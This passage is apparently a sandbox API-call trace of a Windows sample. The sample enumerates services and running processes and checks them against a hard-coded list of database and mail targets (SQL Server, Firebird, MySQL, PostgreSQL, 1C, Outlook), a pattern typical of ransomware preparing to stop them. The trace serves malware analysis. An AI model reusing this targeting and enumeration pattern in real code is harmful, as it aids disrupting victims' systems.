(lpString="LanmanWorkstation") returned 17 [0272.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0272.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0272.016] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0272.016] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0272.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0272.016] lstrlenW (lpString="lmhosts") returned 7 [0272.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0272.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0272.017] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0272.017] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0272.017] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0272.017] lstrlenW (lpString="MMCSS") returned 5 [0272.017] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0272.017] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0272.017] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0272.017] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0272.017] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0272.017] lstrlenW (lpString="MpsSvc") returned 6 [0272.017] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0272.017] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0272.017] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0272.017] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0272.017] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0272.017] lstrlenW (lpString="NlaSvc") returned 6 [0272.017] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0272.017] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0272.017] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0272.017] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0272.017] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0272.017] lstrlenW (lpString="nsi") returned 3 [0272.017] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0272.017] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0272.017] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0272.017] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0272.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0272.018] lstrlenW (lpString="PcaSvc") returned 6 [0272.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0272.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0272.018] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0272.018] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0272.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0272.018] lstrlenW (lpString="PlugPlay") returned 8 [0272.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0272.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0272.018] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0272.018] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0272.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0272.018] lstrlenW (lpString="Power") returned 5 [0272.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0272.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0272.018] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0272.018] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0272.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0272.018] lstrlenW (lpString="ProfSvc") returned 7 [0272.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0272.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0272.018] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0272.018] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0272.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0272.018] lstrlenW (lpString="RpcEptMapper") returned 12 [0272.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0272.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0272.018] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0272.018] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0272.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0272.018] lstrlenW (lpString="RpcSs") returned 5 [0272.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0272.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0272.019] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0272.019] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0272.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0272.019] lstrlenW (lpString="SamSs") returned 5 [0272.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0272.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0272.019] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0272.019] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0272.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0272.019] lstrlenW (lpString="Schedule") returned 8 [0272.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0272.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0272.019] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0272.019] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0272.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0272.019] lstrlenW (lpString="SENS") returned 4 [0272.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0272.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0272.019] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0272.019] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0272.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0272.019] lstrlenW (lpString="ShellHWDetection") returned 16 [0272.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0272.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0272.019] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0272.019] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0272.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0272.019] lstrlenW (lpString="Spooler") returned 7 [0272.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0272.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0272.019] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0272.019] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0272.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0272.020] lstrlenW (lpString="SysMain") returned 7 [0272.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0272.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0272.020] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0272.020] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0272.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0272.020] lstrlenW (lpString="Themes") returned 6 [0272.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0272.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0272.020] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0272.020] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0272.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0272.020] lstrlenW (lpString="TrkWks") returned 6 [0272.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0272.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0272.020] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0272.020] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0272.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0272.020] lstrlenW (lpString="UxSms") returned 5 [0272.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0272.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0272.020] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0272.020] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0272.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0272.020] lstrlenW (lpString="Winmgmt") returned 7 [0272.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0272.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0272.020] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0272.020] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0272.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0272.020] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0272.020] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x388 [0272.021] Process32FirstW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.021] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0272.022] lstrlenW (lpString="System") returned 6 [0272.022] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0272.022] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0272.022] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0272.022] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0272.022] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0272.022] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0272.022] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0272.022] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0272.022] lstrlenW (lpString="smss.exe") returned 8 [0272.022] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0272.022] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0272.022] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0272.022] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0272.022] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0272.022] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0272.022] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0272.022] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.023] lstrlenW (lpString="csrss.exe") returned 9 [0272.023] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0272.023] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0272.023] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0272.023] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0272.023] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0272.023] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0272.023] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0272.023] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0272.023] lstrlenW (lpString="wininit.exe") returned 11 [0272.023] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0272.023] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0272.023] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0272.023] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0272.023] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0272.023] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0272.023] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0272.023] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.024] lstrlenW (lpString="csrss.exe") returned 9 [0272.024] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0272.024] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0272.024] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0272.024] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0272.024] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0272.024] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0272.024] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0272.024] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0272.024] lstrlenW (lpString="winlogon.exe") returned 12 [0272.024] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0272.024] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0272.024] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0272.024] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0272.024] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0272.024] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0272.024] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0272.024] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0272.025] lstrlenW (lpString="services.exe") returned 12 [0272.025] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0272.025] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0272.025] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0272.025] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0272.025] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0272.025] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0272.025] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0272.025] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0272.025] lstrlenW (lpString="lsass.exe") returned 9 [0272.025] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0272.025] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0272.025] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0272.025] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0272.025] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0272.025] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0272.025] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0272.025] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0272.025] lstrlenW (lpString="lsm.exe") returned 7 [0272.025] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0272.026] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0272.026] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0272.026] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0272.026] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0272.026] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0272.026] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0272.026] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.026] lstrlenW (lpString="svchost.exe") returned 11 [0272.026] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.026] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.026] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.026] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.026] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.026] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.026] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.027] lstrlenW (lpString="svchost.exe") returned 11 [0272.027] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.027] lstrlenW (lpString="svchost.exe") returned 11 [0272.027] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.027] lstrlenW (lpString="svchost.exe") returned 11 [0272.027] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.027] lstrlenW (lpString="svchost.exe") returned 11 [0272.027] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0272.028] lstrlenW (lpString="audiodg.exe") returned 11 [0272.028] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.028] lstrlenW (lpString="svchost.exe") returned 11 [0272.028] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.028] lstrlenW (lpString="svchost.exe") returned 11 [0272.028] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0272.028] lstrlenW (lpString="userinit.exe") returned 12 [0272.028] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0272.029] lstrlenW (lpString="dwm.exe") returned 7 [0272.029] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0272.029] lstrlenW (lpString="explorer.exe") returned 12 [0272.029] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0272.029] lstrlenW (lpString="spoolsv.exe") returned 11 [0272.029] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0272.030] lstrlenW (lpString="taskhost.exe") returned 12 [0272.030] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.030] lstrlenW (lpString="svchost.exe") returned 11 [0272.030] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0272.030] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0272.030] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0272.030] lstrlenW (lpString="reader_sl.exe") returned 13 [0272.030] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0272.031] CloseHandle (hObject=0x388) returned 1 [0272.031] Sleep (dwMilliseconds=0x1f4) [0272.787] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea330 [0273.015] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0273.021] GetLastError () returned 0xea [0273.021] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe90) returned 0x3dec5a0 [0273.021] EnumServicesStatusExW (in: hSCManager=0x47ea330, 